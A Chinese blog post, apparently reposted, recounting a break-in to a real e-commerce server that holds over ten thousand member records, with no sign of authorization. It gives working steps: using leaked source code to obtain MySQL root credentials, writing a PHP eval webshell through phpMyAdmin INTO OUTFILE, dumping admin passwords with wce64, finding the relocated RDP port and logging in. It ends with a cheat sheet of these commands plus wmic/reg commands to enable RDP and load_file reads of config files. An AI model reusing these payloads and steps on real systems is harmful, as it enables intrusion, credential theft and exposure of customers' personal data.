溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務(wù)條款》

源代碼泄露獲取某電子商務(wù)網(wǎng)站服務(wù)器權(quán)限

發(fā)布時間:2020-04-28 13:21:18 來源:網(wǎng)絡(luò) 閱讀:2494 作者:simeon2005 欄目:建站服務(wù)器

源代碼泄露獲取某電子商務(wù)網(wǎng)站服務(wù)器權(quán)限

simeon

   ***本次目標事發(fā)偶然,通過shadon對“phpMyAdmin”關(guān)鍵字進行檢索時,加入“indexOf”關(guān)鍵字后,會出現(xiàn)所有存在列目錄漏洞的網(wǎng)站,該網(wǎng)站為電子商務(wù)網(wǎng)站,網(wǎng)站保留有數(shù)萬會員真實信息,下面將整過***過程進行分享。

1.發(fā)現(xiàn)目標

   通過shadon搜索引擎對搜索記錄逐個打開,發(fā)現(xiàn)某目標站點存在文件目錄泄露漏洞:

http://203.***.**.227/

http://203.***.**.227/www.********.hk.rar

http://203.***.**.227/phpMyAdmin/

http://203.***.**.227/news********hk/

  目錄還有phpinfo.php文件,看到phpMyAdminphpinfo.php同時存在,感覺服務(wù)器權(quán)限已經(jīng)不遠了,如圖1所示,有網(wǎng)站源代碼打包文件,將其下載到本地。

源代碼泄露獲取某電子商務(wù)網(wǎng)站服務(wù)器權(quán)限

1文件泄露

2.查看源代碼打包文件

   整個源代碼壓縮包2.37 GB,真大!通過搜索和查看,確定數(shù)據(jù)庫配置文件為config.php

如圖2所示,將其解壓到本地,使用notepad進行查看,果然其中包含了數(shù)據(jù)庫配置信息,而且還是root帳號,密碼雖然算弱口令,但也是弱口令中的強口令。

源代碼泄露獲取某電子商務(wù)網(wǎng)站服務(wù)器權(quán)限

2尋找數(shù)據(jù)庫配置文件

源代碼泄露獲取某電子商務(wù)網(wǎng)站服務(wù)器權(quán)限

3獲取數(shù)據(jù)庫root帳號和密碼

3.尋找網(wǎng)站物理路徑

   通過phpinfo.php文件查看,在瀏覽器中可以使用Ctrl+F快捷鍵搜索關(guān)鍵字“SCRIPT_FILENAME”獲取其真實物理路徑地址,_SERVER["SCRIPT_FILENAME"]      D:/WWW/phpinfo.php,如圖4所示。

源代碼泄露獲取某電子商務(wù)網(wǎng)站服務(wù)器權(quán)限

4獲取網(wǎng)站物理路勁

4.Mysql直接導出Webshell

   通過獲取的root帳號和密碼登錄http://203.***.**.227/phpMyAdmin/,成功登錄,如圖5所示,選擇SQL查詢,在其中查詢select'<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/www/p.php'導出一句話后門。

源代碼泄露獲取某電子商務(wù)網(wǎng)站服務(wù)器權(quán)限

5登錄mysql數(shù)據(jù)庫

源代碼泄露獲取某電子商務(wù)網(wǎng)站服務(wù)器權(quán)限

6查詢導出一句話后門

6.獲取webshell

 在瀏覽器中對http://203.***.**.227地址刷新即可獲取一句話后門文件地址:http://203.***.**.227/p.php,在瀏覽器中打開進行訪問,一切正常。使用中國菜刀一句話后門管理軟件,shell添加并打開,如圖7所示,順利獲取webshell

源代碼泄露獲取某電子商務(wù)網(wǎng)站服務(wù)器權(quán)限

7獲取webshell

7.服務(wù)器提權(quán)

    目測該系統(tǒng)php運行權(quán)限為系統(tǒng)權(quán)限,上傳wce64.exe,然后在終端管理中輸入“wce64-w”命令成功獲取管理員帳號密碼,如圖8所示。

源代碼泄露獲取某電子商務(wù)網(wǎng)站服務(wù)器權(quán)限

8獲取管理員密碼

8.獲取3389端口

   在終端管理器中執(zhí)行netstat -an|find "3389",無結(jié)果顯示,估計管理員修改了默認端口,使用tasklist /svc命令獲取進程名稱和服務(wù),找到termservice所對應的進程號,可以直接使用命令 tasklist /svc | find"termService"來獲取對應的PID號,如圖9所示,在本例中對應的ID號是1340。源代碼泄露獲取某電子商務(wù)網(wǎng)站服務(wù)器權(quán)限

9獲取遠程終端服務(wù)對應的PID

  然后使用“netstat -ano”命令尋找1340對應的端口號,如圖10所示,對應的TCP端口為7755端口,也可以使用命令netstat-ano | find '1340'命令直接顯示。

10獲取終端服務(wù)對應的端口

9.登錄遠程終端

   在命令提示符下輸入mstsc.exe,打開遠程終端登陸器,在3389遠程桌面登錄中的地址中輸入“203.***.**.227:7755”,然后使用獲取的管理員密碼成功登錄系統(tǒng),如圖11所示。

源代碼泄露獲取某電子商務(wù)網(wǎng)站服務(wù)器權(quán)限

11成功登錄系統(tǒng)

10.域名反查

   打開http://www.yougetsignal.com/tools/web-sites-on-web-server/網(wǎng)站對IP地址203.***.**.227進行域名反查,如圖12所示,該IP下存在網(wǎng)站,打開該網(wǎng)站,該網(wǎng)站為一個電子商務(wù)網(wǎng)站,在該網(wǎng)站中存在數(shù)萬會員資料,如圖13所示。

源代碼泄露獲取某電子商務(wù)網(wǎng)站服務(wù)器權(quán)限

12域名反查

源代碼泄露獲取某電子商務(wù)網(wǎng)站服務(wù)器權(quán)限

13存在1萬多條會員信息

11.***總結(jié)與思考

  對存在phpMyAdmin的站點,通過代碼泄露等方法來獲取數(shù)據(jù)庫的密碼,然后通過讀取文件或者導出文件來獲取webshell

13389端口命令行下獲取總結(jié)

netstat-an |find "3389"  查看3389端口是否開放

tasklist/svc | find "TermService" 獲取對應TermServicePID

netstat-ano | find '1340'  查看上面獲取的PID號對應的TCP端口號

2Windows2008Server命令行開啟3389

wmic/namespace:\\root\cimv2\terminalservices path win32_terminalservicesettingwhere (__CLASS != "") call setallowtsconnections 1

 wmic /namespace:\\root\cimv2\terminalservicespath win32_tsgeneralsetting where (TerminalName ='RDP-Tcp') callsetuserauthenticationrequired 1

 reg add"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v

3wce64 -w 命令直接獲取系統(tǒng)明文登錄密碼

4)在phpinfo中查找SCRIPT_FILENAME關(guān)鍵字獲取真實路徑

5phpmyadmin一句話后門導出

select'<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/www/p.php'

6phpstudy敏感配置文件

selectload_file(' D:\phpStudy\Lighttpd\conf\vhosts.conf ');

select load_file('D:\phpStudy\Lighttpd\conf\ lighttpd.conf ');

selectload_file(' D:\phpStudy\Apache\conf\vhosts.conf');

selectload_file(' D:\phpStudy\Apache\conf\httpd.conf');

selectload_file('c:\boot.ini');

selectload_file('c:\boot.ini');

selectload_file(' D:\phpStudy\MySQL\my.ini');

 


向AI問一下細節(jié)

免責聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點不代表本網(wǎng)站立場,如果涉及侵權(quán)請聯(lián)系站長郵箱:is@yisu.com進行舉報,并提供相關(guān)證據(jù),一經(jīng)查實,將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI